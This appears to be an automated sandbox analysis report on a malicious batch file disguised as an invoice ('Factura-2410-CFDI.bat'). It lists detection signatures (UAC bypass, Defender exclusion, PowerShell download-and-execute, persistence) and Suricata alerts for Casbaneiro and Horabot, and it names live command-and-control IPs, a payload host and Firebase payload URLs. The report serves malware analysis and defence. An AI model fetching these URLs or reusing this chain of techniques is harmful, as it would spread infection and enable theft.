Windows Analysis Report
Factura-2410-CFDI.bat

Overview

General Information

Sample name: Factura-2410-CFDI.bat
Analysis ID: 1542952
MD5: 2cba1f2ecba7411565c62f74f8ff095c
SHA1: e69a4fccd578e235fa31c3edc9d8b4a6974faeb0
SHA256: 1a17e8bd86fbe8d1fb1aedce6182de434a3a8e71488f6d285651c168d03242eb
Infos:

Detection

Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Sigma detected: Powershell Download and Execute IEX
Suricata IDS alerts for network traffic
UAC bypass detected (Fodhelper)
Yara detected Powershell download and execute
Adds a directory exclusion to Windows Defender
Bypasses PowerShell execution policy
Found suspicious powershell code related to unpacking or dynamic code loading
Loading BitLocker PowerShell Module
Powershell creates an autostart link
Powershell drops PE file
Sigma detected: Execution of Powershell Script in Public Folder
Sigma detected: Potential Startup Shortcut Persistence Via PowerShell.EXE
Sigma detected: PowerShell Base64 Encoded IEX Cmdlet
Sigma detected: PowerShell Download and Execution Cradles
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious PowerShell Download and Execute Pattern
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious powershell command line found
Uses shutdown.exe to shutdown or reboot the system
AV process strings found (often used to terminate AV products)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: PowerShell Web Download
Sigma detected: Powershell Defender Exclusion
Sigma detected: Startup Folder File Write
Sigma detected: Suspicious Execution of Shutdown
Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
Sigma detected: Usage Of Web Request Commands And Cmdlets
Stores files to the Windows start menu directory
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

AV Detection
barindex
Antivirus detection for dropped file
Source: C:\Users\Public\computer_kjfech8_V.cmd Avira: detection malicious, Label: BAT/Runner.VPF
Source: C:\Users\Public\computer_kjfech8_Vy.cmd Avira: detection malicious, Label: BAT/Runner.VPF
Source: C:\Users\Public\Documents\vs1.ps1 Avira: detection malicious, Label: TR/PShell.Dldr.VPJ
Multi AV Scanner detection for dropped file
Source: C:\_kjfech8_V\jli.dll ReversingLabs: Detection: 18%

Privilege Escalation
barindex
UAC bypass detected (Fodhelper)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry value created: DelegateExecute Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry value created: NULL C:\_kjfech8_V\_kjfech8_Vi7.exe Jump to behavior
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe File opened: C:\_kjfech8_V\MSVCR100.dll Jump to behavior
Source: unknown HTTPS traffic detected: 93.127.200.211:443 -> 192.168.11.20:49752 version: TLS 1.2
Source: Binary string: msvcr100.i386.pdb source: _kjfech8_Vi7.exe, _kjfech8_Vi7.exe, 0000000B.00000002.29808351670.000000006FD71000.00000020.00000001.01000000.00000009.sdmp
Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000014.00000002.30385075264.0000014C514D0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb> source: powershell.exe, 00000014.00000002.30388421204.0000014C517A7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: c:\workspace\8-2-build-windows-i586-cygwin\jdk8u92\6642\build\windows-i586\jdk\objs\kinit_objs\kinit.pdb source: _kjfech8_Vi7.exe, 00000009.00000000.29777323121.0000000000D02000.00000002.00000001.01000000.00000008.sdmp, _kjfech8_Vi7.exe, 0000000B.00000000.29782413626.0000000000D02000.00000002.00000001.01000000.00000008.sdmp, _kjfech8_Vi7.exe, 0000000B.00000002.29804465764.0000000000D02000.00000002.00000001.01000000.00000008.sdmp
Source: Binary string: System.Core.pdb source: powershell.exe, 00000014.00000002.30385075264.0000014C514D0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000014.00000002.30388421204.0000014C517A7000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000014.00000002.30388421204.0000014C51760000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.pdb source: powershell.exe, 00000014.00000002.30390098625.0000014C517D6000.00000004.00000020.00020000.00000000.sdmp
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 9_2_6FDCEFE1 _stat32,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,strlen,GetDriveTypeA,free,free,_sopen_s,_fstat32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose, 9_2_6FDCEFE1
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 9_2_6FDD0F84 _wstat32i64,__doserrno,_errno,_invalid_parameter_noinfo,wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,wcspbrk,wcslen,GetDriveTypeW,free,free,_wsopen_s,_fstat32i64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose, 9_2_6FDD0F84
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 9_2_6FDD0B33 _wstat64,__doserrno,_errno,_invalid_parameter_noinfo,wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,wcspbrk,wcslen,GetDriveTypeW,free,free,_wsopen_s,_fstat64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose, 9_2_6FDD0B33
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 9_2_6FDCCA9B _malloc_crt,FindClose,FindFirstFileExW,FindNextFileW,FindClose, 9_2_6FDCCA9B
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 9_2_6FDCC775 _malloc_crt,FindClose,FindFirstFileExA,FindNextFileA,FindClose, 9_2_6FDCC775
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 9_2_6FDD0702 _wstat32,__doserrno,_errno,_invalid_parameter_noinfo,wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,wcspbrk,wcslen,GetDriveTypeW,free,free,_wsopen_s,_fstat32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose, 9_2_6FDD0702
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 9_2_6FDCDF35 _wfindfirst32,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,_wfindnext32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,_wfindfirst64,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,_wfindnext64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,_wfindfirst64i32,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,_wfindnext64i32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,_wfindfirst32i64,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,_wfindnext32i64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson, 9_2_6FDCDF35
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 9_2_6FDCFD86 _stat32i64,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,strlen,GetDriveTypeA,free,free,_sopen_s,_fstat32i64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose, 9_2_6FDCFD86
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 9_2_6FD97C6D _wstat64i32,wcspbrk,_getdrive,FindFirstFileExW,wcspbrk,wcslen,_errno,__doserrno,__doserrno,_errno,_invalid_parameter_noinfo,towlower,GetDriveTypeW,free,free,_wsopen_s,_fstat64i32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose, 9_2_6FD97C6D
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 9_2_6FDCDA38 _findfirst64i32,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,strcpy_s,_invoke_watson,_findnext64i32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,strcpy_s,_invoke_watson,_findfirst32i64,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,strcpy_s,_invoke_watson,_findnext32i64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,strcpy_s,_invoke_watson,_seterrormode,SetErrorMode, 9_2_6FDCDA38
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 9_2_6FDCF8B5 _stat64i32,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,strlen,GetDriveTypeA,free,free,_sopen_s,_fstat64i32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose, 9_2_6FDCF8B5
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 9_2_6FDCD4FF _findfirst32,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,strcpy_s,_invoke_watson,_findnext32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,strcpy_s,_invoke_watson,_findfirst64,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,strcpy_s,_invoke_watson,_findnext64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,strcpy_s,_invoke_watson, 9_2_6FDCD4FF
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 9_2_6FDCF40B _stat64,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,strlen,GetDriveTypeA,free,free,_sopen_s,_fstat64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose, 9_2_6FDCF40B
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 11_2_6FDCEFE1 _stat32,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,strlen,GetDriveTypeA,free,free,_sopen_s,_fstat32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose, 11_2_6FDCEFE1
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 11_2_6FDD0F84 _wstat32i64,__doserrno,_errno,_invalid_parameter_noinfo,wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,wcspbrk,wcslen,GetDriveTypeW,free,free,_wsopen_s,_fstat32i64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose, 11_2_6FDD0F84
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 11_2_6FDD0B33 _wstat64,__doserrno,_errno,_invalid_parameter_noinfo,wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,wcspbrk,wcslen,GetDriveTypeW,free,free,_wsopen_s,_fstat64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose, 11_2_6FDD0B33
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 11_2_6FDCCA9B _malloc_crt,FindClose,FindFirstFileExW,FindNextFileW,FindClose, 11_2_6FDCCA9B
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 11_2_6FDCC775 _malloc_crt,FindClose,FindFirstFileExA,FindNextFileA,FindClose, 11_2_6FDCC775
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 11_2_6FDD0702 _wstat32,__doserrno,_errno,_invalid_parameter_noinfo,wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,wcspbrk,wcslen,GetDriveTypeW,free,free,_wsopen_s,_fstat32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose, 11_2_6FDD0702
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 11_2_6FDCDF35 _wfindfirst32,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,_wfindnext32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,_wfindfirst64,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,_wfindnext64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,_wfindfirst64i32,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,_wfindnext64i32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,_wfindfirst32i64,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson,_wfindnext32i64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileW,GetLastError,_errno,_errno,_errno,wcscpy_s,_invoke_watson, 11_2_6FDCDF35
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 11_2_6FDCFD86 _stat32i64,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,strlen,GetDriveTypeA,free,free,_sopen_s,_fstat32i64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose, 11_2_6FDCFD86
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 11_2_6FD97C6D _wstat64i32,wcspbrk,_getdrive,FindFirstFileExW,wcspbrk,wcslen,_errno,__doserrno,__doserrno,_errno,_invalid_parameter_noinfo,towlower,GetDriveTypeW,free,free,_wsopen_s,_fstat64i32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose, 11_2_6FD97C6D
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 11_2_6FDCDA38 _findfirst64i32,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,strcpy_s,_invoke_watson,_findnext64i32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,strcpy_s,_invoke_watson,_findfirst32i64,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,strcpy_s,_invoke_watson,_findnext32i64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,strcpy_s,_invoke_watson,_seterrormode,SetErrorMode, 11_2_6FDCDA38
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 11_2_6FDCF8B5 _stat64i32,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,strlen,GetDriveTypeA,free,free,_sopen_s,_fstat64i32,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose, 11_2_6FDCF8B5
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 11_2_6FDCD4FF _findfirst32,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,strcpy_s,_invoke_watson,_findnext32,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,strcpy_s,_invoke_watson,_findfirst64,_errno,_invalid_parameter_noinfo,FindFirstFileExA,GetLastError,_errno,_errno,_errno,strcpy_s,_invoke_watson,_findnext64,_errno,_invalid_parameter_noinfo,_errno,_invalid_parameter_noinfo,FindNextFileA,GetLastError,_errno,_errno,_errno,strcpy_s,_invoke_watson, 11_2_6FDCD4FF
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 11_2_6FDCF40B _stat64,__doserrno,_errno,_invalid_parameter_noinfo,_mbspbrk,_errno,__doserrno,_mbctolower,_getdrive,FindFirstFileExA,_mbspbrk,strlen,GetDriveTypeA,free,free,_sopen_s,_fstat64,_close,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,_dosmaperr,FindClose, 11_2_6FDCF40B
Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\Roaming\ Jump to behavior
Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\ Jump to behavior
Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\ Jump to behavior
Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\ Jump to behavior
Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\ Jump to behavior
Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\ Jump to behavior
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 4x nop then add byte ptr [edi], dh 9_2_6FD88468
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 4x nop then push esi 9_2_6FD7F640
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 4x nop then add byte ptr [edi], dh 11_2_6FD88468
Source: C:\_kjfech8_V\_kjfech8_Vi7.exe Code function: 4x nop then push esi 11_2_6FD7F640

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2841717 - Severity 1 - ETPRO MALWARE PowerShell/TrojanDownloader Casbaneiro CnC : 192.168.11.20:49750 -> 62.72.3.210:80
Source: Network traffic Suricata IDS: 2052642 - Severity 1 - ET MALWARE Horabot Payload Inbound : 93.127.200.211:443 -> 192.168.11.20:49752
Source: Network traffic Suricata IDS: 2834717 - Severity 1 - ETPRO MALWARE PowerShell Inbound with Antivirus Enumeration and Downloading Capabilities : 93.127.200.211:443 -> 192.168.11.20:49752
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /a/08/150822/up/up HTTP/1.1Host: fsnat.shopConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /ldht/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.72.3.210Content-Length: 94Expect: 100-continueConnection: Keep-Alive
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: ASMUNDA-ASSC ASMUNDA-ASSC
Source: Joe Sandbox View ASN Name: PRTL-DE PRTL-DE
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown TCP traffic detected without corresponding DNS query: 86.38.217.167
Source: unknown TCP traffic detected without corresponding DNS query: 86.38.217.167
Source: unknown TCP traffic detected without corresponding DNS query: 86.38.217.167
Source: unknown TCP traffic detected without corresponding DNS query: 86.38.217.167
Source: unknown TCP traffic detected without corresponding DNS query: 86.38.217.167
Source: unknown TCP traffic detected without corresponding DNS query: 62.72.3.210
Source: unknown TCP traffic detected without corresponding DNS query: 62.72.3.210
Source: unknown TCP traffic detected without corresponding DNS query: 62.72.3.210
Source: unknown TCP traffic detected without corresponding DNS query: 62.72.3.210
Source: unknown TCP traffic detected without corresponding DNS query: 62.72.3.210
Source: unknown TCP traffic detected without corresponding DNS query: 62.72.3.210
Source: unknown TCP traffic detected without corresponding DNS query: 62.72.3.210
Source: unknown TCP traffic detected without corresponding DNS query: 86.38.217.167
Source: unknown TCP traffic detected without corresponding DNS query: 86.38.217.167
Source: unknown TCP traffic detected without corresponding DNS query: 86.38.217.167
Source: unknown TCP traffic detected without corresponding DNS query: 86.38.217.167
Source: unknown TCP traffic detected without corresponding DNS query: 86.38.217.167
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic HTTP traffic detected: GET /a/08/150822/up/up HTTP/1.1Host: fsnat.shopConnection: Keep-Alive
Source: global traffic DNS traffic detected: DNS query: fsnat.shop
Source: unknown HTTP traffic detected: POST /ldht/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 62.72.3.210Content-Length: 94Expect: 100-continueConnection: Keep-Alive
Source: powershell.exe, 00000004.00000002.30087129699.000001E792E56000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://62.72.3.210
Source: powershell.exe, 00000004.00000002.30087129699.000001E792A77000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://86.38.217.167
Source: powershell.exe, 0000000D.00000002.29797055442.000000000052B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.30385728857.0000014C514FD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: powershell.exe, 0000000D.00000002.29797055442.000000000052B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.30385075264.0000014C514D0000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000004.00000002.30086145780.000001E790A45000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.microsoft.co:
Source: powershell.exe, 00000004.00000002.30098453152.000001E7A28C5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000004.00000002.30087129699.000001E792A77000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000004.00000002.30087129699.000001E792A77000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.pngXzi
Source: powershell.exe, 00000004.00000002.30087129699.000001E7930C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.29798541069.00000000043E7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000004.00000002.30087129699.000001E792851000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.29798541069.0000000004291000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.30351811914.0000014C393C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000004.00000002.30087129699.000001E7930C6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000D.00000002.29798541069.00000000043E7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000004.00000002.30087129699.000001E792A77000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000004.00000002.30087129699.000001E792A77000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.htmlXzi
Source: powershell.exe, 0000000D.00000002.29797055442.000000000052B000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.30385728857.0000014C514FD000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.quovadis.bm0
Source: powershell.exe, 00000004.00000002.30087129699.000001E792851000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.30351811914.0000014C393C1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 0000000D.00000002.29798541069.0000000004291000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000004.00000002.30098453152.000001E7A28C5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000004.00000002.30098453152.000001E7A28C5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000004.00000002.30098453152.000001E7A28C5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000004.00000002.30087129699.000001E792FBC000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firebasestorage.googleapis.com
Source: curl.exe, 00000002.00000002.29379756087.000001AA88A90000.00000004.00000020.00020000.00000000.sdmp, Factura-2410-CFDI.bat String found in binary or memory: https://firebasestorage.googleapis.com/v0/b/antonidesil.appspot.com/o/at3?alt=media&token=0c52e418-0
Source: powershell.exe, 00000004.00000002.30087129699.000001E792E56000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://firebasestorage.googleapis.com/v0/b/ggsabadon.appspot.com/o/md1910_.zip?alt=media&token=0c46
Source: powershell.exe, 00000004.00000002.30087129699.000001E792A77000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
